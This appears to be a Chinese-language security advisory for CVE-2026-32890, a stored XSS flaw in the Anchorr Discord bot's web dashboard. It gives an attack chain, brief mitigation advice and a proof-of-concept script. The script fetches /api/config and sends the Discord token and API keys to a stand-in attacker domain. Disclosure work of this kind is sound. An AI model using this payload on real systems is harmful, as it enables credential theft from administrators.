CVE-2026-32890 CVSS 9.6 严重

CVE-2026-32890 Anchorr 存储型XSS漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32890

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Anchorr

漏洞概述

Anchorr是一个用于请求电影和电视节目的Discord机器人。在1.4.1及以下版本中，其Web仪表板的User Mapping下拉菜单存在存储型XSS漏洞。未经授权的Discord用户可利用此漏洞在管理员的浏览器中执行任意JavaScript，进而结合敏感接口窃取所有配置凭据。

技术细节

该漏洞源于Anchorr Web仪表板的User Mapping功能未对用户输入进行充分的过滤和转义，导致严重的存储型XSS漏洞。攻击者无需对Anchorr本身进行认证，只需在Discord服务器中构造包含恶意JavaScript的载荷并提交。一旦管理员访问受影响的Web仪表板页面，恶意脚本便会在管理员浏览器的上下文中自动执行。关键在于，系统暴露了GET /api/config端点，该端点以明文形式返回所有敏感配置，包括DISCORD_TOKEN、各类API密钥及密码哈希。攻击者可利用XSS执行环境发起AJAX请求调用此接口，将窃取的高价值凭据回传至受控服务器，从而实现完全的权限提升和数据窃取。

攻击链分析

STEP 1

1. 漏洞注入

攻击者作为Discord用户，在Anchorr的Web仪表板User Mapping下拉菜单中输入并提交包含恶意JavaScript代码的载荷。

STEP 2

2. 等待触发

恶意脚本被存储在服务器端。攻击者等待Anchorr管理员登录并访问Web仪表板的相关页面。

STEP 3

3. 执行载荷

当管理员加载页面时，未经过滤的恶意脚本在管理员的浏览器环境中执行。

STEP 4

4. 窃取凭据

脚本利用管理员权限调用GET /api/config接口，获取包含DISCORD_TOKEN、API密钥等敏感信息的明文配置。

STEP 5

5. 数据外带

脚本将获取到的敏感数据通过网络请求发送到攻击者控制的外部服务器，完成攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Malicious payload injected into User Mapping -->
<script>
  // Function to exfiltrate sensitive data
  function exfiltrateData() {
    fetch('/api/config')
      .then(response => response.json())
      .then(data => {
        // Send all secrets to attacker's server
        fetch('https://attacker-controlled-domain.com/collect', {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json'
          },
          body: JSON.stringify(data)
        });
      })
      .catch(error => console.error('Exfiltration failed:', error));
  }

  // Execute immediately when admin views the dashboard
  exfiltrateData();
</script>

影响范围

Anchorr <= 1.4.1

防御指南

临时缓解措施

如果无法立即升级，建议暂时限制Discord服务器的成员加入权限，防止未知用户利用该功能，或在Web应用防火墙(WAF)中配置规则，拦截针对User Mapping接口的恶意脚本输入。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表